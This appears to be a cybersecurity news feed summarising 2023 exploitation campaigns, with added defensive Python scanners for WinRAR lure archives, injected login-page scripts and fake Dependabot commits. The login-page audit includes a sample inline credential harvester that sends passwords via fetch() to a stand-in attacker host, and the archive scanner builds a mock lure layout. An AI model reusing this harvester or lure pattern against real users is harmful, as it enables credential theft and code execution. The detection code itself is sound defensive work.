Take action on the latest cybersecurity events

Cybersecurity advisories and events as they happen, with a clear action you can take.

The Winter Vivern hacking group has been targeting European government entities and think tanks by exploiting a zero-day cross-site scripting vulnerability (CVE-2023-5631) in Roundcube Webmail. A crafted email injects malicious JavaScript that runs in the victim's webmail session when the message is opened, letting the attackers read and steal emails.
VMware has warned customers of an authentication bypass vulnerability in vRealize Log Insight (now VMware Aria Operations for Logs) for which exploit code has been published, enabling remote code execution. Although exploitation requires specific conditions, the flaw also bypasses the fix for a chain of critical vulnerabilities patched in January, letting attackers write malicious files to unpatched VMware appliances.
Google's Threat Analysis Group warns that state-sponsored and financially motivated attackers are actively exploiting CVE-2023-38831 in WinRAR versions prior to 6.23. A crafted archive pairs a benign-looking file with a same-named folder that contains a script; when the user opens the benign file, WinRAR runs the script instead, giving the attacker arbitrary code execution. The bug is fixed in 6.23, but the attacks keep working because many users have not updated WinRAR.
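The practical check here is whether an archive you received has that decoy-plus-folder layout before anyone opens it. The scanner below is an added example, not code from the page or from RARLAB: it assumes the lure is a top-level file whose name collides (after Windows-style normalisation of trailing spaces and case) with a top-level directory holding an executable script, and it only inspects the member list, extracting and executing nothing. The two sample archives are constructed in memory; the `SCRIPT_EXTS` list is a heuristic choice.

```python
"""Heuristic scanner for ZIP archives laid out like the WinRAR CVE-2023-38831 lure.

Added example; not code from the page or from RARLAB. Assumption: the lure pairs a
benign-looking file with a directory of the same (trailing-space) name that holds a
script, and WinRAR runs the script when the decoy is opened. Only the member layout
is checked here; nothing is extracted or executed.
"""
from __future__ import annotations

import io
import posixpath
import zipfile

# Extensions Windows will happily execute when handed to ShellExecute (heuristic).
SCRIPT_EXTS = {".cmd", ".bat", ".exe", ".ps1", ".vbs", ".js", ".wsf", ".scr", ".lnk"}


def _norm(component: str) -> str:
    """Normalise one path component the way Windows resolves names: trailing spaces
    and dots are ignored and matching is case-insensitive, so 'Report.pdf ' collides
    with 'report.pdf'."""
    return component.rstrip(" .").lower()


def suspicious_entries(zf: zipfile.ZipFile) -> list[tuple[str, str]]:
    """Return (decoy_file, script_member) pairs: a top-level file whose name collides
    with a top-level directory that contains an executable script."""
    files: dict[str, str] = {}                # normalised name -> member name
    dir_members: dict[str, list[str]] = {}    # normalised dir name -> members under it
    for info in zf.infolist():
        parts = info.filename.split("/")
        if info.is_dir() or len(parts) > 1:
            dir_members.setdefault(_norm(parts[0]), []).append(info.filename)
        else:
            files[_norm(parts[0])] = info.filename

    findings: list[tuple[str, str]] = []
    for key, members in dir_members.items():
        if key not in files:
            continue
        for member in members:
            leaf = member.rstrip("/").split("/")[-1]
            if posixpath.splitext(leaf)[1].lower() in SCRIPT_EXTS:
                findings.append((files[key], member))
    return findings


def scan(archive_bytes: bytes) -> list[tuple[str, str]]:
    """Scan an in-memory ZIP and return the suspicious (decoy, script) pairs."""
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        return suspicious_entries(zf)


def build_lure_archive() -> bytes:
    """Constructed sample: a decoy 'PDF' plus a same-named folder holding a .cmd."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Report.pdf ", b"%PDF-1.4 decoy\n")
        zf.writestr("Report.pdf /Report.pdf .cmd", b"@echo off\r\necho payload\r\n")
    return buf.getvalue()


def build_clean_archive() -> bytes:
    """Constructed sample: an ordinary archive with a file and an unrelated folder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Report.pdf", b"%PDF-1.4\n")
        zf.writestr("images/logo.png", b"\x89PNG\r\n")
    return buf.getvalue()


if __name__ == "__main__":
    for label, data in (("lure", build_lure_archive()), ("clean", build_clean_archive())):
        print(label, scan(data))
```

A hit means "do not open this in an old WinRAR"; a clean result only means this particular layout is absent, so it is a triage aid, not a substitute for updating to 6.23 or later.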
North Korean state-sponsored groups Diamond Sleet and Onyx Sleet are actively exploiting CVE-2023-42793, a critical remote code execution vulnerability in the JetBrains TeamCity CI/CD server. A compromised build server can expose source code and the service secrets it holds, putting the many organizations that run TeamCity at risk.
CVE-2023-4966 in Citrix NetScaler ADC and NetScaler Gateway, exploited since August, leaks session tokens that let attackers hijack already-authenticated sessions and so bypass multifactor authentication, potentially exposing sensitive information.
Microsoft identified a nation-state actor, possibly linked to China's Ministry of State Security, exploiting a zero-day vulnerability in Atlassian Confluence, and urged customers to patch immediately and inspect their instances for signs of compromise.
IBM's security teams report an ongoing credential harvesting campaign against Citrix NetScaler gateways that are still vulnerable to CVE-2023-3519, which has been exploited since June 2023 to backdoor thousands of instances. The new campaign injects a script into the gateway login page to steal user credentials as they are entered.
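The check a gateway owner wants after reading that is whether the login page they serve contains a script that does not belong there. The audit below is an added example, not code from the page or from IBM: it assumes the legitimate login page loads scripts only from its own host (plus any hosts you allowlist), and treats as suspicious both an external script from another origin and an inline script that reads the password field and sends it somewhere. The page HTML, the `/vpn/js/login.js` path and the `.invalid` hostnames are constructed for the example; the marker lists are heuristics.

```python
"""Audit the <script> tags on a gateway login page for injected credential stealers.

Added example; not code from the page or from IBM. Assumptions: the legitimate page
loads scripts only from its own host, and an injected harvester is either an external
script or an inline script that reads the password field and sends it out. The HTML
below is constructed to show both shapes next to a legitimate inline script.
"""
from __future__ import annotations

from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic markers: an inline script that touches credentials AND talks to the network.
CREDENTIAL_MARKERS = ("passwd", "password")
EXFIL_MARKERS = ("fetch(", "xmlhttprequest", "new image", "sendbeacon")


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies from a page."""

    def __init__(self) -> None:
        super().__init__()
        self.external: list[str] = []
        self.inline: list[str] = []
        self._in_script = False
        self._buf: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def audit_login_page(html: str, page_host: str, allowed_hosts=()) -> list[tuple[str, str]]:
    """Return (kind, detail) findings for scripts that do not belong on the page."""
    parser = ScriptCollector()
    parser.feed(html)
    allowed = {page_host.lower(), *(h.lower() for h in allowed_hosts)}
    findings: list[tuple[str, str]] = []
    for src in parser.external:
        host = urlparse(src).hostname
        if host is None:            # relative URL: same origin as the page
            continue
        if host.lower() not in allowed:
            findings.append(("external-script", src))
    for index, body in enumerate(parser.inline, start=1):
        lowered = body.lower()
        reads_credentials = any(m in lowered for m in CREDENTIAL_MARKERS)
        sends_out = any(m in lowered for m in EXFIL_MARKERS)
        if reads_credentials and sends_out:
            findings.append(("inline-harvester", f"inline script #{index}"))
    return findings


# Constructed sample page: one legitimate relative script, one injected external
# loader, one injected inline harvester and one harmless inline script.
SAMPLE_LOGIN_PAGE = """<!DOCTYPE html>
<html><head><title>Gateway</title>
<script src="/vpn/js/login.js"></script>
<script src="https://cdn.example-attacker.invalid/loader.js"></script>
</head><body>
<form id="login"><input name="login"><input type="password" name="passwd"></form>
<script>
  document.getElementById("login").addEventListener("submit", function () {
    var p = document.getElementsByName("passwd")[0].value;
    fetch("https://collector.example-attacker.invalid/p?d=" + encodeURIComponent(p));
  });
</script>
<script>window.onload = function () { console.log("page ready"); };</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_login_page(SAMPLE_LOGIN_PAGE, "gateway.example.com"):
        print(finding)
```

Run it against the HTML your gateway actually serves (fetch it with the same browser path a user would take, since the injected script is only served from the compromised appliance) and compare the result with a copy taken from a known-clean appliance of the same firmware version.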
Cybercriminals compromised GitHub accounts and pushed commits posing as the Dependabot automated updater to infiltrate projects and steal passwords from developers, primarily targeting users in Indonesia. The attack exfiltrated GitHub secrets and modified JavaScript files to capture passwords entered by end users.
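A commit that merely carries the name "dependabot[bot]" proves nothing; what distinguishes a genuine Dependabot commit is the identity GitHub attaches to it and the signature GitHub applies. The script below is an added example, not code from the page or from GitHub: it assumes genuine Dependabot commits use the author address `49699333+dependabot[bot]@users.noreply.github.com` and carry a signature that `git` reports as good (`G`) or good-but-untrusted-key (`U`), and it flags any commit that presents as Dependabot but fails either check. The sample log lines are constructed; in practice you feed it the output of `git log --format='%H%x1f%an%x1f%ae%x1f%G?%x1f%s'`.

```python
"""Flag commits that claim to be from Dependabot but do not look like GitHub-made ones.

Added example; not code from the page or from GitHub. Assumptions (labelled):
genuine Dependabot commits carry the author e-mail
49699333+dependabot[bot]@users.noreply.github.com and a signature git reports as
'G' (good) or 'U' (good, untrusted key). Input format is the output of
    git log --format='%H%x1f%an%x1f%ae%x1f%G?%x1f%s'
The log lines at the bottom are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass

SEP = "\x1f"  # ASCII unit separator: commit subjects may contain spaces and tabs
DEPENDABOT_EMAIL = "49699333+dependabot[bot]@users.noreply.github.com"  # assumed
GOOD_SIGNATURE = {"G", "U"}  # git %G? codes that indicate a verified signature


@dataclass
class Commit:
    sha: str
    author_name: str
    author_email: str
    sig_status: str
    subject: str


def parse_log(text: str) -> list[Commit]:
    """Parse SEP-delimited git log lines into Commit records."""
    commits: list[Commit] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(SEP)
        if len(fields) != 5:
            raise ValueError(f"unexpected log line: {line!r}")
        commits.append(Commit(*fields))
    return commits


def impersonation_findings(commits: list[Commit]) -> list[tuple[str, list[str]]]:
    """Return (sha, reasons) for commits that present as Dependabot but fail the checks."""
    findings: list[tuple[str, list[str]]] = []
    for c in commits:
        if "dependabot" not in c.author_name.lower():
            continue  # not claiming to be Dependabot; out of scope for this check
        reasons: list[str] = []
        if c.author_email.lower() != DEPENDABOT_EMAIL:
            reasons.append(f"author e-mail {c.author_email} is not Dependabot's")
        if c.sig_status not in GOOD_SIGNATURE:
            reasons.append(f"signature status {c.sig_status!r}, expected a verified one")
        if reasons:
            findings.append((c.sha, reasons))
    return findings


def scan_log(text: str) -> list[tuple[str, list[str]]]:
    """Parse and check a git log dump in one call."""
    return impersonation_findings(parse_log(text))


# Constructed sample: a genuine bump, an unsigned impostor, an impostor with a
# foreign e-mail, and an ordinary human commit that should not be reported.
SAMPLE_LOG = "\n".join(SEP.join(fields) for fields in [
    ("a1b2c3d4", "dependabot[bot]", DEPENDABOT_EMAIL, "G", "Bump lodash from 4.17.20 to 4.17.21"),
    ("f00dbabe", "dependabot[bot]", DEPENDABOT_EMAIL, "N", "fix"),
    ("c0ffee12", "dependabot[bot]", "dev@attacker.invalid", "N", "Bump axios from 0.21.1 to 0.21.4"),
    ("deadbeef", "Alice Example", "alice@example.com", "N", "Fix typo in README"),
])

if __name__ == "__main__":
    for sha, reasons in scan_log(SAMPLE_LOG):
        print(sha, "; ".join(reasons))
```

The signature check only means something if your clone can verify GitHub's web-flow key, so import it (or rely on the `U` status, which still proves the commit was signed) before trusting a clean run; an unsigned "Dependabot" commit pushed with a stolen token is exactly the case this catches.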
Google detected exploit chains targeting iOS and Android devices in Egypt that combined vulnerabilities in both platforms to achieve remote code execution. The chains were delivered by man-in-the-middle redirection of the victim's web traffic and by malicious links sent over SMS and WhatsApp.
The U.S. Department of Health and Human Services warns the healthcare and public health sector of a significant risk from North Korea's Lazarus Group, which is exploiting CVE-2022-47966, a critical vulnerability in Zoho ManageEngine IT management products, to deploy malware. The advisory urges organizations to update the affected software immediately.